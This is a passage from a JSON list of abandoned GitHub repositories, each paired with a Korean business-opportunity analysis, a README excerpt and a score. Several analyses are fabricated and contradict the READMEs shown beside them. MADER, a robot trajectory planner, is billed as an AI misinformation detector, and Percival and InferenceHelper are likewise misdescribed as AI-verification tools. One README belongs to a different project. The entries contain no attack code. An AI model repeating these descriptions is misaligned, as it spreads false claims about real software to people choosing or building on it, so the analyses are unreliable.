Bishop ([PRML](http://research.microsoft.com/en-us/um/people/cmbishop/prml/)).\n\nIt is written purely in Matlab language. It is self-contained. There is no external dependency.\n\nNote: this package requires Matlab **R2016b** or latter, since it utilizes a new Matlab syntax called [Implicit expansion](https://cn.mathworks.com/help/matlab/release-notes.html?rntext=implicit+expansion&startrelease=R2016b&endrelease=R2016b&groupby=release&sortby=descending) (a.k.a. broadcasting). It also requires Statistics Toolbox (for some simple random number generator) and Image Processing Toolbox (for reading image data).\n\nDesign Goal\n-------\n* Succinct: The code is extremely compact. Minimizing code length is a major goal. As a result, the core of the algorithms can be easily spotted.\n* Efficient: Many tricks for speeding up Matlab code are appli","composite_score":0.5857,"license_safety_tag":"safe"},{"name":"mit-acl/mader","github_url":"https://github.com/mit-acl/mader","stars":22,"language":"C++","license":"BSD-3-Clause","abandonment_months":42,"description":"# MADER 저장소 분석\n\n## 왜 보물인가\n인공지능이 생성한 거짓 정보를 탐지하는 기술로, 신뢰할 수 없는 AI 답변으로부터 사용자를 보호할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **챗봇 신뢰성 검증 SaaS**: 기업의 고객 지원 챗봇이 정확한 정보만 제공하는지 자동 검사하는 월 구독 서비스\n2. **교육 플랫폼 내부 도구**: 온라인 강의 ","readme_excerpt":"# MADER: Trajectory Planner in Multi-Agent and Dynamic Environments #\n\n\n### **Accepted for publication in the IEEE Transactions on Robotics (T-RO)**\n\n\nSingle-Agent               |  Multi-Agent           | \n:-------------------------:|:-------------------------:|\n[![MADER: Trajectory Planner in Multi-Agent and Dynamic Environments](./mader/imgs/single_agent1.gif)](https://www.youtube.com/watch?v=aoSoiZDfxGE \"MADER: Trajectory Planner in Multi-Agent and Dynamic Environments\")      |  [![MADER: Trajectory Planner in Multi-Agent and Dynamic Environments](./mader/imgs/circle.gif)](https://www.youtube.com/watch?v=aoSoiZDfxGE \"MADER: Trajectory Planner in Multi-Agent and Dynamic Environments\") |  \n[![MADER: Trajectory Planner in Multi-Agent and Dynamic Environments](./mader/imgs/single_agent2.gif)](https://www.youtube.com/watch?v=aoSoiZDfxGE \"MADER: Trajectory Planner in Multi-Agent and Dynamic Environments\")       |  [![MADER: Trajectory Planner in Multi-Agent and Dynamic Environments](./mad","composite_score":0.5856,"license_safety_tag":"safe"},{"name":"yudai/gotty","github_url":"https://github.com/yudai/gotty","stars":13,"language":"Go","license":"mit","abandonment_months":22,"description":"# yudai/gotty 사업화 분석\n\n## 왜 보물인가\n터미널(명령어 창)을 웹 브라우저에서 바로 사용할 수 있게 만드는 기술로, 복잡한 설치 없이 어디서나 서버를 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 개발 환경 플랫폼 (GitHub Codespaces 같은 서비스)에 통합하여 브라우저 기반 개발 환경 제공","readme_excerpt":"# ![](https://raw.githubusercontent.com/yudai/gotty/master/resources/favicon.png) GoTTY - Share your terminal as a web application\n\n[![GitHub release](http://img.shields.io/github/release/yudai/gotty.svg?style=flat-square)][release]\n[![Wercker](http://img.shields.io/wercker/ci/55d0eeff7331453f0801982c.svg?style=flat-square)][wercker]\n[![MIT License](http://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)][license]\n\n[release]: https://github.com/yudai/gotty/releases\n[wercker]: https://app.wercker.com/project/bykey/03b91f441bebeda34f80e09a9f14126f\n[license]: https://github.com/yudai/gotty/blob/master/LICENSE\n\nGoTTY is a simple command line tool that turns your CLI tools into web applications.\n\n![Screenshot](https://raw.githubusercontent.com/yudai/gotty/master/screenshot.gif)\n\n# Installation\n\nDownload the latest stable binary file from the [Releases](https://github.com/yudai/gotty/releases) page. Note that the release marked `Pre-release` is built for testing purpose, which ca","composite_score":0.5855,"license_safety_tag":"safe"},{"name":"bailicangdu/react-pxq","github_url":"https://github.com/bailicangdu/react-pxq","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":54,"description":"# bailicangdu/react-pxq 상용화 분석\n\n## 왜 보물인가\nReact라는 인기 있는 웹 개발 도구를 더 쉽게 사용하도록 만든 보조 도구로, 개발자의 작업 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발사들을 위한 개발 속도 향상 구독 서비스\n2. **내부 업무 도구**: 대형 IT 회사의 개발팀","readme_excerpt":"\n## 技术栈：\n  react + redux + webpack + react-router + ES6/7/8 + immutable\n\n\n## 运行项目（nodejs 6.0+）\n```\n git clone https://github.com/bailicangdu/react-pxq.git\n\n cd react-pxq\n\n npm i  或者运行  yarn(推荐)\n  \n npm start\n\n npm run build （发布）\n```\n\n\n## 说明\n\n>  本项目主要用于理解 react 和 redux 的编译方式，以及 react + redux 之间的配合方式\n\n>  如果觉得不错的话，您可以点右上角 \"Star\" 支持一下 谢谢！ ^_^\n\n>  或者您可以 \"follow\" 一下，我会不断开源更多的有趣的项目\n\n>  如有问题请直接在 Issues 中提，或者您发现问题并有非常好的解决方案，欢迎 PR 👍\n\n>  开发环境 macOS 10.13.1  Chrome 63  nodejs 8.9.1\n\n>  推荐一个 vue2 + vuex 构建的 45 个页面的大型开源项目。[地址在这里](https://github.com/bailicangdu/vue2-elm)\n\n>  另外一个 vue2 + vuex 的简单项目，非常适合入门练习。[地址在这里](https://github.com/bailicangdu/vue2-happyfri)\n\n\n## 演示\n\n[查看演示效果](https://cangdu.org/pxq/)（请用chrome的手机模式预览）\n\n### 移动端扫描下方二维码\n\n<img src=\"https://github.com/bailicangdu/pxq/blob/master/screenshot/demo1.png\" width=\"200\" height=\"200\"/>\n\n\n\n# 个人感悟\n\n## 做React需要会什么？\nreact的功能其实很单一，主要负责渲染的功能，现有的框架，比如angular是一个大而全的框架，用了angular几乎就不需要用其他工具辅助配合，但是react不一样，他只负责ui渲染，想要做好一个项目，往往需要其他库和工具的配合，比如用redux来管理数据，react-","composite_score":0.5854,"license_safety_tag":"safe"},{"name":"linyacool/WebServer","github_url":"https://github.com/linyacool/WebServer","stars":10,"language":"C++","license":"MIT","abandonment_months":32,"description":"# WebServer 저장소 분석\n\n## 왜 보물인가\n웹사이트를 운영하는 데 필요한 기본 서버 기술을 직접 만들 수 있는 오픈소스 코드로, 누구나 자신의 인터넷 서비스를 독립적으로 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 스타트업이 자체 웹 호스팅 서비스를 구축하여 고객에게 제공\n- **내부 업무 도구**: 회사 ","readme_excerpt":"# A C++ High Performance Web Server\r\n\r\n[![Build Status](https://travis-ci.org/linyacool/WebServer.svg?branch=master)](https://travis-ci.org/linyacool/WebServer)\r\n[![license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://opensource.org/licenses/MIT)\r\n\r\n  \r\n## Introduction  \r\n\r\n本项目为C++11编写的Web服务器，解析了get、head请求，可处理静态资源，支持HTTP长连接，支持管线化请求，并实现了异步日志，记录服务器运行状态。  \r\n\r\n\r\n\r\n| Part Ⅰ | Part Ⅱ | Part Ⅲ | Part Ⅳ | Part Ⅴ | Part Ⅵ |\r\n| :--------: | :---------: | :---------: | :---------: | :---------: | :---------: |\r\n| [并发模型](https://github.com/linyacool/WebServer/blob/master/并发模型.md)|[连接的维护](https://github.com/linyacool/WebServer/blob/master/连接的维护.md)|[版本历史](https://github.com/linyacool/WebServer/blob/master/%E7%89%88%E6%9C%AC%E5%8E%86%E5%8F%B2.md) | [测试及改进](https://github.com/linyacool/WebServer/blob/master/测试及改进.md) | [项目目的](https://github.com/linyacool/WebServer/blob/master/%E9%A1%B9%E7%9B%AE%E7%9B%AE%E7%9A%84.md) | [面试问题](https://github.com/linyacool/WebServer/blob/master","composite_score":0.5853,"license_safety_tag":"safe"},{"name":"TechXueXi/techxuexi-js","github_url":"https://github.com/TechXueXi/techxuexi-js","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":26,"description":"# TechXueXi/techxuexi-js 분석 리포트\n\n## 왜 보물인가\n학습 플랫폼 자동화 도구로, 반복적인 학습 관리 작업을 대신 처리해주는 작은 유틸리티입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 직원 학습 이수율 관리 시스템에 통합하여 자동으로 진도 처리\n2. **학원/교육기관용 SaaS**: 학생들의 필수 과정 이수","readme_excerpt":"# techxuexi-js\n\n**[交流群地址及说明（点击查看）](https://github.com/TechXueXi/TechXueXi/issues/14)**\n\n**我们随时删库跑路，请加交流群防失联。**\n\n有建议说上传到 greasyfork，方便更新。其实，我们在这里发布，是因为有同志发现 greasyfork **有审查**，上传就被举报，被封，**都没有地方可以下载**，所以在这里开库收集的。**该同志表示： 习惯在 greasyfork 找强国佛系xx的人，太年轻了，还不知道社会的险恶**\n\n收集油猴等插件的科技强国 js 代码。\n\n这里没有各种恶心的审查，欢迎大家提交贡献，比如新增脚本，修改代码等。\n\n提交贡献方法： https://github.com/TechXueXi/TechXueXi/blob/dev/CONTRIBUTING.md\n\n## 使用方法\n\n请优先使用 不学习何以强国 ，它可以全自动，以后维护工作以它为主， 强国学习 需要手动进入答题。\n\n装个浏览器插件 tampermonkey （可以从这里下载 https://github.com/TechXueXi/Tampermonkey ，网上也很多教程），点击插件里添加按钮，去掉编辑框里原来的代码，把 不学习何以强国 js 脚本复制粘贴进编辑框保存。开启这个脚本，然后进入网页强国 www.xuexi.cn 登录，刷新登录网页，左上角有启动按钮。\n\n### 如何设置自动升级？\n\n看图：\n\n![image](https://user-images.githubusercontent.com/86897692/149704031-d69cc183-ff29-40a0-94d4-a74f1d2a0edc.png)\n\n![image](https://user-images.githubusercontent.com/86897692/149704044-2fb0c908-c312-42a1-9b14-1a71411b54fe.png)\n\n\n## 不想每天开电脑学习，可以配置 techxuexi python 在服务器。  https://github.com/TechXueXi/TechXueXi\n","composite_score":0.5853,"license_safety_tag":"unknown"},{"name":"vuejs/vue-hackernews-2.0","github_url":"https://github.com/vuejs/vue-hackernews-2.0","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# Vue Hackernews 2.0 상용화 분석\n\n## 왜 보물인가\n해커뉴스(기술 커뮤니티 뉴스 플랫폼)처럼 빠르고 가벼운 뉴스 피드 사이트를 만들 수 있는 완성도 높은 기술 템플릿입니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스/커뮤니티 SaaS**: 특정 업계(부동산, 금융, 기술) 뉴스만 모아 보는 구독형 서비스\n2. **기업 내부 공지사항 플랫폼*","readme_excerpt":"# vue-hackernews-2.0\n\nHackerNews clone built with Vue 2.0 + vue-router + vuex, with server-side rendering.\n\n<p align=\"center\">\n  <a href=\"https://vue-hn.herokuapp.com\" target=\"_blank\">\n    <img src=\"https://cloud.githubusercontent.com/assets/499550/17546273/5aabc5fc-5eaf-11e6-8d6a-ad00937e8bd6.png\" width=\"700px\">\n    <br>\n    Live Demo\n  </a>\n</p>\n\n## Features\n\n> Note: in practice, it is unnecessary to code-split for an app of this size (where each async chunk is only a few kilobytes), nor is it optimal to extract an extra CSS file (which is only 1kb) -- they are used simply because this is a demo app showcasing all the supported features.\n\n- Server Side Rendering\n  - Vue + vue-router + vuex working together\n  - Server-side data pre-fetching\n  - Client-side state & DOM hydration\n  - Automatically inlines CSS used by rendered components only\n  - Preload / prefetch resource hints\n  - Route-level code splitting\n- Progressive Web App\n  - App manifest\n  - Service worker\n  - 100/100 Lighthou","composite_score":0.5851,"license_safety_tag":"safe"},{"name":"vuejs/vue-devtools","github_url":"https://github.com/vuejs/vue-devtools","stars":13,"language":"TypeScript","license":"mit","abandonment_months":21,"description":"# Vue DevTools 상용화 분석\n\n## 왜 보물인가\n웹 개발자들이 자신이 만든 프로그램의 문제를 찾고 고치는 과정을 훨씬 쉽게 해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 교육 플랫폼 (SaaS)**: 초보 개발자를 위한 온라인 강좌에 통합하여 실시간으로 코드 동작을 시각화해주는 학습 도구로 제공\n\n2. **기업 내부 웹앱","readme_excerpt":"# Try the next iteration of Vue Devtools!\n\nWe have a brand new version of Devtools being developed at [vuejs/devtools-next](https://github.com/vuejs/devtools-next). It is now in beta, please help us [test it out](https://devtools-next.vuejs.org/getting-started/installation)!\n\n---\n\n# vue-devtools\n\n![screenshot](./media/screenshot-shadow.png)\n\n[Documentation](https://devtools.vuejs.org/) | [Install the extension](https://devtools.vuejs.org/guide/installation.html)\n\n## Monorepo\n\n|Package|Description|\n|-------|-----------|\n[api](./packages/api) | The public devtools API that can be installed in Vue plugins |\n[app-backend-api](./packages/app-backend-api) | Abstract API to link the Public API, the core and Vue handlers |\n[app-backend-core](./packages/app-backend-core) | The main logic injected in the page to interact with Vue apps |\n[app-backend-vue1](./packages/app-backend-vue1) | Decoupled handlers to support Vue 1 (soon) |\n[app-backend-vue2](./packages/app-backend-vue2) | Decoupled handle","composite_score":0.585,"license_safety_tag":"safe"},{"name":"iwatake2222/InferenceHelper","github_url":"https://github.com/iwatake2222/InferenceHelper","stars":12,"language":"C++","license":"Apache-2.0","abandonment_months":50,"description":"# InferenceHelper 상용화 분석\n\n## 왜 보물인가\n인공지능이 내린 결정이 맞는지 검증하고 잘못된 답변을 걸러내는 기술로, AI 서비스의 신뢰성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료/금융 SaaS**: 진단 보조 또는 대출 심사 AI가 제시한 결과의 신뢰도를 자동으로 검증하는 기능\n2. **고객지원 API**: 챗","readme_excerpt":"<p align=\"center\">\r\n  <img src=\"00_doc/logo.png\" />\r\n</p>\r\n\r\n# Inference Helper\r\n- This is a wrapper of deep learning frameworks especially for inference\r\n- This class provides a common interface to use various deep learnig frameworks, so that you can use the same application code\r\n\r\n## Supported frameworks\r\n- TensorFlow Lite\r\n- TensorFlow Lite with delegate (XNNPACK, GPU, EdgeTPU, NNAPI)\r\n- TensorRT (GPU, DLA)\r\n- OpenCV(dnn) (with GPU)\r\n- OpenVINO with OpenCV (xml+bin)\r\n- ncnn (with Vulkan)\r\n- MNN (with Vulkan)\r\n- SNPE (Snapdragon Neural Processing Engine SDK (Qualcomm Neural Processing SDK for AI v1.51.0))\r\n- Arm NN\r\n- NNabla (with CUDA)\r\n- ONNX Runtime (with CUDA)\r\n- LibTorch (with CUDA)\r\n- TensorFlow (with GPU)\r\n\r\n![Overview](00_doc/overview.png) \r\n\r\n## Supported targets\r\n- Windows 10 (Visual Studio 2019 x64)\r\n- Linux (x64, armv7, aarch64)\r\n- Android (armeabi-v7a, arm64-v8a)\r\n\r\n## CI Status\r\n| Framework                 | Windows (x64)                                 | Linux (x64)  ","composite_score":0.5844,"license_safety_tag":"safe"},{"name":"hoverinc/ray-tracing-renderer","github_url":"https://github.com/hoverinc/ray-tracing-renderer","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":48,"description":"# ray-tracing-renderer 분석 보고서\n\n## 왜 보물인가\n사진처럼 현실적인 3D 이미지를 만드는 핵심 기술인데, 일반인도 쉽게 사용할 수 있도록 만들어진 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 온라인 건축 시각화 플랫폼**\n건축주가 웹에서 직접 건물 설계도를 입력하면 현실적인 3D 렌더링 이미지를 자동 ","readme_excerpt":"\n\n\n# Ray Tracing Renderer\nA [Three.js](https://github.com/mrdoob/three.js/) renderer which utilizes path tracing to render a scene with true photorealism. The renderer supports global illumination, reflections, soft shadows, and realistic environment lighting.\n\n[Demo](https://hoverinc.github.io/ray-tracing-renderer/scenes/sample-models/) | [User Guide](https://github.com/hoverinc/ray-tracing-renderer/wiki/User-Guide) | [API Reference](https://github.com/hoverinc/ray-tracing-renderer/wiki/RayTracingRenderer) | [Contributing](https://github.com/hoverinc/ray-tracing-renderer#contributing)\n\n\n## Usage\n\nRayTracingRenderer is the *early alpha stage* of development. Features are incomplete and subject to change, and the renderer is unstable on certain hardware.\n### Download\n\n* [Latest ES6 Build](https://raw.githubusercontent.com/hoverinc/ray-tracing-renderer/master/build/RayTracingRenderer.js)\n* [Latest ES5 Build](https://raw.githubusercontent.com/hoverinc/ray-tracing-renderer/master/build/Ray","composite_score":0.5843,"license_safety_tag":"safe"},{"name":"stanzhai/be-a-professional-programmer","github_url":"https://github.com/stanzhai/be-a-professional-programmer","stars":5,"language":"","license":"MIT","abandonment_months":40,"description":"# be-a-professional-programmer 분석\n\n## 왜 보물인가\n프로그래머가 되기 위해 필요한 실무 지식과 학습 경로를 체계적으로 정리한 교육 자료로, 비전공자도 프로그래밍 커리어를 시작할 수 있는 로드맵을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 프로그래밍 입문자 대상 유료 강좌나 구독 서비스로 제공\n- **","readme_excerpt":"# 前言\n\n成为一名专业程序员的道路上，需要坚持练习、学习与积累，技术方面既要有一定的广度，更要有自己的深度。\n\n笔者作为一位tool mad，将工作以来用到的各种优秀资料、神器及框架整理在此，毕竟好记性不如烂键盘，此项目可以作为自己的不时之需。\n\n本人喜欢折腾，记录的东西也比较杂，各方面都会有一些，内容按重要等级排序，大家各取所需。\n\n这里的东西会持续积累下去，欢迎Star，也欢迎发PR给我。\n\n[Thonatos.Yang](https://github.com/thonatos)整理的GitBook版本，阅读体验更佳：<https://thonatos.gitbooks.io/be-a-professional-programmer/>\n\n## 目录\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n\n\n- [资料篇](#%E8%B5%84%E6%96%99%E7%AF%87)\n  - [技术站点](#%E6%8A%80%E6%9C%AF%E7%AB%99%E7%82%B9)\n  - [必看书籍](#%E5%BF%85%E7%9C%8B%E4%B9%A6%E7%B1%8D)\n  - [大牛博客](#%E5%A4%A7%E7%89%9B%E5%8D%9A%E5%AE%A2)\n  - [GitHub篇](#github%E7%AF%87)\n- [工具篇](#%E5%B7%A5%E5%85%B7%E7%AF%87)\n  - [平台工具&框架](#%E5%B9%B3%E5%8F%B0%E5%B7%A5%E5%85%B7%E6%A1%86%E6%9E%B6)\n  - [常用工具](#%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7)\n  - [第三方服务](#%E7%AC%AC%E4%B8%89%E6%96%B9%E6%9C%8D%E5%8A%A1)\n  - [爬虫相关(好玩的工具)](#%E7%88%AC%E8%99%AB%E7%9B%B8%E5%85%B3%E5%A5%BD%E7%8E%A9%E7%","composite_score":0.5841,"license_safety_tag":"safe"},{"name":"jadore801120/attention-is-all-you-need-pytorch","github_url":"https://github.com/jadore801120/attention-is-all-you-need-pytorch","stars":6,"language":"Python","license":"mit","abandonment_months":26,"description":"# attention-is-all-you-need-pytorch 분석\n\n## 왜 보물인가\nAI가 텍스트를 이해하고 번역하거나 요약할 때 사용하는 핵심 기술을 직접 구현한 교육용 코드라, 실제 AI 서비스 개발의 기초를 배우고 응용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 자동 이메일 답변 작성, 문서 요약, 다국어 번역 서비","readme_excerpt":"# Attention is all you need: A Pytorch Implementation\n\nThis is a PyTorch implementation of the Transformer model in \"[Attention is All You Need](https://arxiv.org/abs/1706.03762)\" (Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, Illia Polosukhin, arxiv, 2017). \n\n\nA novel sequence to sequence framework utilizes the **self-attention mechanism**, instead of Convolution operation or Recurrent structure, and achieve the state-of-the-art performance on **WMT 2014 English-to-German translation task**. (2017/06/12)\n\n> The official Tensorflow Implementation can be found in: [tensorflow/tensor2tensor](https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py).\n\n> To learn more about self-attention mechanism, you could read \"[A Structured Self-attentive Sentence Embedding](https://arxiv.org/abs/1703.03130)\".\n\n<p align=\"center\">\n<img src=\"http://imgur.com/1krF2R6.png\" width=\"250\">\n</p>\n\n\nThe project support t","composite_score":0.5838,"license_safety_tag":"safe"},{"name":"kefu-chat/src","github_url":"https://github.com/kefu-chat/src","stars":21,"language":"PHP","license":"MIT","abandonment_months":37,"description":"# kefu-chat/src 프로젝트 분석\n\n## 왜 보물인가\n고객 상담을 자동으로 처리해주는 AI 챗봇 기술로, 중소기업이 비용을 들이지 않고도 24시간 고객 서비스를 운영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"우리 고객상담 AI\" 같은 월 구독형 온라인 서비스로 제공하여 전국 중소상점, 온라인몰이 구독료를 내고","readme_excerpt":"# 闪客服后端\n\n[![单元测试](https://github.com/fastsupport-cn/src/workflows/build/badge.svg)](https://github.com/fastsupport-cn/src/actions?query=workflow%3Abuild)\n\n> 基于 Laravel 的客服系统: [www.kefu.chat](https://www.kefu.chat).\n\n## 安装\n\n```bash\ncomposer install\ncp .env.example .env\n\n#修改数据库、Redis密码和\ncode .env\n\nphp artisan key:generate\nphp artisan jwt:secret\nphp artisan migrate\n```\n\n```bash\n#导入省市区街道数据库\nphp artisan pca:refreshData -d jd\n```\n\n```bash\n#初始化套餐信息\nphp artisan db:seed --class=Database\\\\Seeders\\\\PlansTableSeeder\n\n#初始化管理员\nphp artisan db:seed --class=Database\\\\Seeders\\\\PermissionSeeder\nphp artisan db:seed --class=Database\\\\Seeders\\\\AdminSeeder\n\n#待分配对话\nphp artisan db:seed --class=Database\\\\Seeders\\\\ConversationTableSeeder\nphp artisan db:seed --class=Database\\\\Seeders\\\\MessageTableSeeder\n\n#已分配对话\nphp artisan db:seed --class=Database\\\\Seeders\\\\ConversationTableSeeder\nphp artisan db:seed --class=Database\\\\Seeders\\\\MessageTableSeeder\nphp artisan db:seed --class=Database\\\\Seeders\\\\AssignSeeder\n\n#全新企业\np","composite_score":0.5833,"license_safety_tag":"safe"},{"name":"hanxiao/bert-as-service","github_url":"https://github.com/hanxiao/bert-as-service","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":28,"description":"# bert-as-service 상용화 분석\n\n## 왜 보물인가\n텍스트를 컴퓨터가 이해할 수 있는 형태로 변환해주는 기술로, 챗봇·검색·추천 시스템 등 거의 모든 AI 서비스의 기초가 되는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **검색 엔진 SaaS**: 기업 내부 문서나 고객 데이터를 빠르게 검색하는 클라우드 서비스로 월 구독료 수금\n2. ","readme_excerpt":"<p align=\"center\">\n<a href=\"https://clip-as-service.jina.ai\"><img src=\"https://github.com/jina-ai/clip-as-service/blob/main/docs/_static/logo-light.svg?raw=true\" alt=\"CLIP-as-service logo: The data structure for unstructured data\" width=\"200px\"></a>\n<br><br><br>\n</p>\n\n\n<p align=center>\n<a href=\"https://pypi.org/project/clip_server/\"><img alt=\"PyPI\" src=\"https://img.shields.io/pypi/v/clip_server?label=Release&style=flat-square\"></a>\n<a href=\"https://discord.jina.ai\"><img src=\"https://img.shields.io/discord/1106542220112302130?logo=discord&logoColor=white&style=flat-square\"></a>\n<a href=\"https://codecov.io/gh/jina-ai/clip-as-service\"><img alt=\"Codecov branch\" src=\"https://img.shields.io/codecov/c/github/jina-ai/clip-as-service/main?logo=Codecov&logoColor=white&style=flat-square\"></a>\n<a href=\"https://colab.research.google.com/github/jina-ai/clip-as-service/blob/main/docs/hosting/cas-on-colab.ipynb\"><img src=\"https://img.shields.io/badge/Host-on%20Google%20Colab%20(GPU/TPU)-brightgreen?st","composite_score":0.5829,"license_safety_tag":"unknown"},{"name":"kefu-chat/frontend","github_url":"https://github.com/kefu-chat/frontend","stars":13,"language":"CSS","license":"MIT","abandonment_months":35,"description":"# kefu-chat/frontend 분석\n\n## 왜 보물인가\n고객 상담을 실시간으로 처리하는 채팅 시스템으로, 온라인 비즈니스가 필수적으로 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 쇼핑몰이나 서비스 회사가 자신의 웹사이트에 설치하는 고객상담 도구\n2. **내부 업무 도구**: 콜센터나 고객지원팀이 여러 문의를 한곳","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://kefu.chat\">\n    <img width=\"100\" src=\"src/assets/logo-color.svg\">\n  </a>\n</p>\n\n<h1 align=\"center\">客服洽</h1>\n\n<div align=\"center\">\n  高效、敏捷的客服平台.\n\n  [![Build Status](https://dev.azure.com/ng-alain/ng-alain/_apis/build/status/ng-alain-CI?branchName=master)](https://dev.azure.com/ng-alain/ng-alain/_build/latest?definitionId=2&branchName=master)\n  [![Dependency Status](https://david-dm.org/ng-alain/ng-alain/status.svg?style=flat-square)](https://david-dm.org/ng-alain/ng-alain)\n  [![GitHub Release Date](https://img.shields.io/github/release-date/ng-alain/ng-alain.svg?style=flat-square)](https://github.com/ng-alain/ng-alain/releases)\n  [![NPM version](https://img.shields.io/npm/v/ng-alain.svg?style=flat-square)](https://www.npmjs.com/package/ng-alain)\n  [![prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg?style=flat-square)](https://prettier.io/)\n  [![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg?style=flat","composite_score":0.5828,"license_safety_tag":"safe"},{"name":"ekzhang/percival","github_url":"https://github.com/ekzhang/percival","stars":18,"language":"Rust","license":"MIT","abandonment_months":40,"description":"# Percival 저장소 분석\n\n## 왜 보물인가\n인공지능이 복잡한 질문에 답할 때 **단계별로 올바르게 생각하도록 돕는 도구**로, 잘못된 답변을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객지원 챗봇 SaaS**: 은행이나 보험사의 AI 상담원이 복잡한 질문(예: 대출 자격 심사)을 정확히 답하도록 지원\n2. **의료진 진단 보조 도구*","readme_excerpt":"# Percival\n\n[Percival](https://percival.ink/) is a **declarative data query and\nvisualization language**. It provides a reactive, web-based notebook environment\nfor exploring complex datasets, producing interactive graphics, and sharing\nresults.\n\n<p align=\"center\">\n  <a href=\"https://percival.ink/\">\n    <img src=\"https://i.imgur.com/zW5cuBH.png\" width=\"720\"><br>\n    <strong>percival.ink</strong>\n  </a>\n</p>\n\nPercival combines the flexibility of\n[_Datalog_](https://en.wikipedia.org/wiki/Datalog) as a query language for\nrelational data with the beauty of\n[_exploratory visualization grammars_](https://observablehq.com/@observablehq/plot).\nThese declarative components interact through a reactive dataflow system.\nBecause Percival uses web technologies (including Web Workers for multithreaded,\nsandboxed execution), fully-interactive notebooks can be shared with anyone on\nthe Internet, making data analyses more tangible to others.\n\nAt the core of Percival is a custom Datalog compiler, built w","composite_score":0.5828,"license_safety_tag":"safe"},{"name":"UnityTechnologies/open-project-1","github_url":"https://github.com/UnityTechnologies/open-project-1","stars":5,"language":"C#","license":"Apache-2.0","abandonment_months":34,"description":"# UnityTechnologies/open-project-1 분석\n\n## 왜 보물인가\nUnity(게임 제작 엔진)의 공식 예제 프로젝트로, 게임 개발 학습과 실무 참고 자료로 매우 높은 신뢰도를 보유하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 플랫폼**: 초보자부터 중급자를 위한 온라인 강의 또는 부트캠프의 커리큘럼 기초 자료로 활","readme_excerpt":"⚠ Note: As of December 2021, Open Projects and Chop Chop are not in development anymore. For more information, read [here](https://forum.unity.com/threads/news-and-updates.981531/#post-7703068). The information below is kept as legacy.\n\n# Unity Open Project #1: Chop Chop\n\n![Unity Open Projects](/Docs/ReadmeImages/ApproachingTheIsland_Header.jpg)\n\nWelcome! This is the repository for the first Unity **Open Project**, an initiative where Unity and the community collaborate together to create a small **open-source game demo**.\n\nThe first game, ~~which is currently under development~~, is an action-adventure titled _Chop Chop_ ([more info](https://open.codecks.io/unity-open-project-1/decks/32/card/126-what-is-this)).\n\n## Follow the progress\n* The [dedicated sub-forum](https://forum.unity.com/forums/open-projects.531/) on the Unity forums is where the Unity team and the whole community discuss and brainstorm ideas.  \n* The [roadmap](https://open.codecks.io/unity-open-project-1) is the centra","composite_score":0.5827,"license_safety_tag":"safe"},{"name":"kefu-chat/MpKechat","github_url":"https://github.com/kefu-chat/MpKechat","stars":10,"language":"Vue","license":"MIT","abandonment_months":66,"description":"# kefu-chat/MpKechat 보물 지도\n\n## 왜 보물인가\n고객 문의에 실시간으로 자동 응답하는 챗봇 시스템으로, 기업의 고객 상담 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 쇼핑몰이나 온라인 매장을 위한 \"자동 고객 상담 서비스\"로 월 구독료 판매\n2. **내부 업무 도구**: 대형 콜센","readme_excerpt":" ``开源不易，需要鼓励。给 ThorUI项目点个 star吧`` [GitHub](https://github.com/dingyong0214/ThorUI-uniapp)\n\n# ThorUI\nThorUI组件库，uni-app版本，v3编译，支持nvue uni-app编译模式（原weex编译模式），easycom组件模式（无需手动引入，开发工具自带智能感知）\n\n|  ![微信小程序](https://thorui.cn/img/applets.jpg) |![H5二维码](https://thorui.cn/img/h5_qrcode.png)  |![QQ小程序](https://thorui.cn/img/qq_applets.png)  |![Android](https://thorui.cn/img/thorui_apk.png)  |\n| ------------ | ------------ | ------------ | ------------ |\n|  微信小程序 |H5二维码  | QQ小程序  | Android App  |\n\n# 网站介绍\n\n[https://www.thorui.cn/](https://www.thorui.cn/)\n\n# ThorUI组件文档\n\n[https://thorui.cn/doc/](https://thorui.cn/doc/)\n\n| ![](https://thorui.cn/img/V132/qq_3.jpg)  |![](https://thorui.cn/img/V132/qq_4.png)  |\n| ------------ | ------------ |\n|  ThorUI QQ交流群3：605135318 |ThorUI QQ交流群4：928308676  | \n\n\n本项目已同步更新到[微信小程序(原生小程序代码)](https://github.com/dingyong0214/ThorUI)，后续会更新到支付宝小程序，百度小程序，头条小程序等\n\n## 更新日志\r\n\r\n## 